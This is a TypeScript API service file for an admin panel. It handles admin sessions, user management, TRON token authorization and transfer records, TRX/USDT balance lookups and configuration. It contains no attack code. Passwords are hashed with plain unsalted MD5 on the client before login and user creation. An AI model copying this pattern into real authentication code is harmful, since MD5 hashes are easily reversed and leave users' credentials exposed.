import { ApiResponse, LoginParams, LoginResult, ApproveFilter, ApproveRL, TransApproveFilter, TransApproveRL } from '@/services/typing';
import { request } from '@umijs/max';
import { md5 } from 'js-md5';



export const userLogin = (data: LoginParams) => {
  data.password = md5(data.password);
  return request<ApiResponse<LoginResult>>('admin/session', {
    method: 'POST',
    data,
  });
};



export const banUser = (data: any) => {
  return request(`admins/ban`, {
    method: 'POST',
    data,
  });
};


export const createUser = (data: any) => {
  return request('admin', {
    method: 'POST',
    data: {
      ...data,
      password: md5(data.password),
    },
  });
};


export const getUserList = (params: any) => {
  return request('admin', {
    params,
  });
};

// 获取授权记录列表
export const getApproveList = (params: ApproveFilter) => {
  return request('approve', {
    params,
  });
};

// 获取划转记录列表
export const getTransApproveList = (params: TransApproveFilter) => {
  return request('trans/approve', {
    params,
  });
};

// 创建授权记录
export const createApprove = (data: {
  ownerAddress: string;
  authorizeAddress: string;
  type: string;
}) => {
  return request('approve', {
    method: 'POST',
    data,
  });
};

// 查询余额
export const getBalance = (id: string, type: 'TRX' | 'USDT') => {
  return request(`approve/${id}/balance`, {
    params: { type },
  });
};

// 创建划转记录
export const createTransApprove = (data: {
  ownerAddress: string;
  authorizeAddress: string;
  recipient: string;
  amount: string;
  txId: string;
}) => {
  return request('trans/approve', {
    method: 'POST',
    data,
  });
};



export const getConfig = () => {
  return request('config');
};

export const updateConfig = (data: any) => {
  return request('config', {
    method: 'POST',
    data,
  });
};




export const userLogout = async () => {
  try {
    return await request('admin/session/close', {
      method: 'POST',
    });
  } catch {}
};
